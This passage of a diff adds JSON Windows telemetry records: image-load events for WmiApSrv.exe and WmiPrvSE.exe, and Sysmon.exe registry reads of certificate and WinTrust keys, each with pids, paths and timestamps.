+ "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": 
"C:\\Windows\\System32\\bcrypt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msscntrs.dll", + "image_path": "C:\\Windows\\System32\\msscntrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "perfdisk.dll", + "image_path": "C:\\Windows\\System32\\perfdisk.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, 
+ "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + 
"unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481980000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 